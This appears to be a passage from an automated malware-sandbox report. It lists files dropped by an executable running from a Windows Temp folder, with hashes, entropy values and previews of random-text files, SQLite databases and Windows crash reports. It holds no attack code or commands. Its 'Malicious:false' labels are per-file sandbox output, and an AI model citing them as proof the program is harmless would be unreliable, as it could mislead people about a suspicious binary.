                                                                                                                                                                                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):1.0828400367048245
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:LRXVfIn00r50jxJGxugCzuiFkZ24IO8Xh:VVfI00r50jYCzuiFkY4IO8Xh
                                                                                                                                                                                                                            MD5:72E5E7DC201C9D10D9C9CB41F905FC2D
                                                                                                                                                                                                                            SHA1:BE1034A3D21AF4D64674F1E1C5D35754AB5524E5
                                                                                                                                                                                                                            SHA-256:BF83BC6E823A088974946F14A791BFF440C914EC05238C76AB1AD27A90BDB8CD
                                                                                                                                                                                                                            SHA-512:E2C1904E07BBBC4B549B3B2DEF4D496C1BDB23D82869152C6BD0E7A762F8FC92CF8A51E9B3E7ED7D321F1D6D2D5A84CDC636AC46A4EEBBD982F5E3DF5943705C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.0.2.2.4.8.6.5.1.8.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.0.2.2.4.9.4.0.1.8.5.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.c.c.3.7.1.2.-.f.0.d.0.-.4.2.c.7.-.b.a.6.5.-.a.c.1.0.0.3.a.e.f.5.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.7.b.8.4.b.f.-.2.e.f.e.-.4.0.5.5.-.8.6.8.b.-.e.1.a.e.9.8.f.8.a.6.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.7.7.d.R.Q.1.C.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.a.8.-.0.0.0.1.-.0.0.1.4.-.3.e.d.5.-.b.0.b.a.d.e.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.7.f.9.e.5.7.a.f.7.4.c.2.7.3.4.a.9.d.6.9.1.5.3.c.6.8.c.4.8.5.0.0.0.0.f.f.f.f.!.0.0.0.0.f.a.4.8.e.5.a.8.6.b.5.f.2.b.0.4.b.7.9.f.6.c.3.4.5.9.3.3.9.a.1.6.c.2.d.b.6.a.a.a.!.g.7.7.d.R.Q.1.C.s.m...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):1.1508686671330186
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:n06d7C72tRP0nK/wxTjxpZrP2H9HmzuiF4+Z24IO8Yd:06dG72tR8nKYFj9aGzuiF4+Y4IO8Y
                                                                                                                                                                                                                            MD5:A903957C9F82BB4A35625EDCB5E00C64
                                                                                                                                                                                                                            SHA1:DA5C128E796489DBFA642743FF86C8A55404CFD7
                                                                                                                                                                                                                            SHA-256:3D2E054857A0014A511B9AD478107A5C4808CC9106AF12EBD56C9DA55F2AAFCA
                                                                                                                                                                                                                            SHA-512:23B5E1ECE46B1A06FB0C99E3839A05B235BB43DB581709E12DE5E7AAE4B5B0095A88C05B26FA153A11F487C48212C3204D1A3AA959DEB1ACC752661009372949
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.0.2.2.7.4.7.4.2.5.3.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.0.2.2.7.5.6.2.9.6.3.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.c.1.7.e.3.e.-.f.7.b.4.-.4.b.0.7.-.8.b.9.e.-.d.d.4.e.3.a.e.2.5.a.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.f.d.d.6.7.5.-.1.b.5.3.-.4.7.0.c.-.b.1.7.b.-.4.3.3.7.7.9.8.6.e.2.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.4.2.w...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.b.8.-.0.0.0.1.-.0.0.1.4.-.7.6.8.a.-.5.3.b.e.d.e.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.e.0.d.5.9.4.4.2.3.6.9.7.6.d.c.5.f.4.6.d.0.c.9.2.3.1.9.f.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.3.2.a.f.7.3.b.d.4.a.f.b.b.1.e.b.7.b.1.2.0.2.6.0.8.2.e.6.0.d.b.e.3.3.6.6.7.9.3.c.!.u.4.2.w...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4./.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Apr 25 07:04:09 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):46280
                                                                                                                                                                                                                            Entropy (8bit):2.7280001935845615
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:+PlObRh14FDYqkYbYSJc18bKpFITyU7zTr07:jbf6DYqkYbYSJc1vc1k7
                                                                                                                                                                                                                            MD5:AE0714415E3FF5F07CAAA24EB452FD8D
                                                                                                                                                                                                                            SHA1:FA16F1A516DBE320C59D1FAE743EC26A42CB87C2
                                                                                                                                                                                                                            SHA-256:7723A597373310B946C497A2EF5FCDA14BBA57589B0AE6A7FED772652446241D
                                                                                                                                                                                                                            SHA-512:4E27296FC5A89C0C14D6159AEC9111B85D50F0FEE3D683E88EA4EF80F09ACDDB71C44BFB75C95BD33E569730A87021212BDAC04B7BFD5F6099C8240B7684E1CB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MDMP..a..... .......i.*f............4...........H...H.......d....#..........D?..........`.......8...........T...........0:...z...........(...........*..............................................................................eJ......x+......GenuineIntel............T...........W.*f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8350
                                                                                                                                                                                                                            Entropy (8bit):3.698039139042853
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJCK626Y95SUatgmf244RpD/89bvasf/lm:R6lXJX626YDSUatgmf244kv5fg
                                                                                                                                                                                                                            MD5:40BA410B133C7BB897CD7D41FE85D31F
                                                                                                                                                                                                                            SHA1:83CE12060A99D62A80DBF48BC3C41FFF00A9318E
                                                                                                                                                                                                                            SHA-256:010AF2D7AF6553FB7E0C57ECE33D5750AC8B6948E325368B5BE8A9648B8F54B0
                                                                                                                                                                                                                            SHA-512:36A581C3D844CA8FB03B1D4D31355DD9FEAF21139C58F0DADB79A85A6E6E38227993EB92DEF1E3395E039049B82E9A13CBECB2D96778F3B3CB40A4FF80AFB1A2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.8.8.<./.P.i.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4595
                                                                                                                                                                                                                            Entropy (8bit):4.478570057261215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsIJg77aI9b4WpW8VYEYm8M4Jm/F++q8GS9c9d:uIjfOI7tx7VcJvC9c9d
                                                                                                                                                                                                                            MD5:A6D67EFB4B1CF84107AC454E63617403
                                                                                                                                                                                                                            SHA1:7D0EC294CD783E7B191810BF30DCE308B34B79A3
                                                                                                                                                                                                                            SHA-256:73044EC8852EB25CA291E7DEAEFFD439567BC775CB37416042E4753BFCC902D3
                                                                                                                                                                                                                            SHA-512:F9BFED1737E15F2D761FCC75FF0DD8422F8D08149DEE71DF1573F9EF673334825FAC32718392B0B035D8596199234963A2AA8019CF81888560BE3421D4672AAF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295086" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Thu Apr 25 07:04:35 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):57218
                                                                                                                                                                                                                            Entropy (8bit):2.5589419762501002
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:BV0XDXUGejrYXfFaXIgraOQOJwN2zbeBnZVk+fAo7mFp9UawvPoS5E//ofUnGgD9:/NGeKF3+QEcnZVrONCHfSG6yEEUGnPt
                                                                                                                                                                                                                            MD5:17D55C71027AA424617E7B498FF086DE
                                                                                                                                                                                                                            SHA1:6DA1B544398ABDA710513F3CBA79C2DD52739414
                                                                                                                                                                                                                            SHA-256:99F58098D10BE229CEB6F74C2E75FE071FB0ED1CBC99815C6BB50E7CC6E37C29
                                                                                                                                                                                                                            SHA-512:EEB75FCA18994791E0934C01412B01F740760F3AF6015AA4DEE6C1D96FC92A251D0EC209EE3060D2E664B3A8C96C5C41A2EFD08E91AA2F50B82819189D00A32B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MDMP..a..... .........*f............4............ ..<...........v9..........T.......8...........T...........P[..2...........((...........*..............................................................................eJ.......*......GenuineIntel............T...........^.*f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6420
                                                                                                                                                                                                                            Entropy (8bit):3.718853295297442
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:RSIU6o7wVetbX96spxY0ZQbAlABLh5QgaMQU089bAYRasfoagm:R6l7wVeJX96EY1bAgpD089bApsfoagm
                                                                                                                                                                                                                            MD5:0A0C326D071EDAA2A85839D8886898F9
                                                                                                                                                                                                                            SHA1:32831FA23FEF0E68A4FB87D81062F308540C6A23
                                                                                                                                                                                                                            SHA-256:664548D0B195A3BB42D46FD9FE36C5D6EAB31F1B01D0BF509CF8811AB203D78C
                                                                                                                                                                                                                            SHA-512:F97582763B238E34DFE673CD10CB2C40834A3FF127B580314E448B4B5E2AC07A93FADE02D294F723CC2DDC545B68C80099E097A3746717737C0EEEE746912C79
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.2.0.<./.P.i.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4704
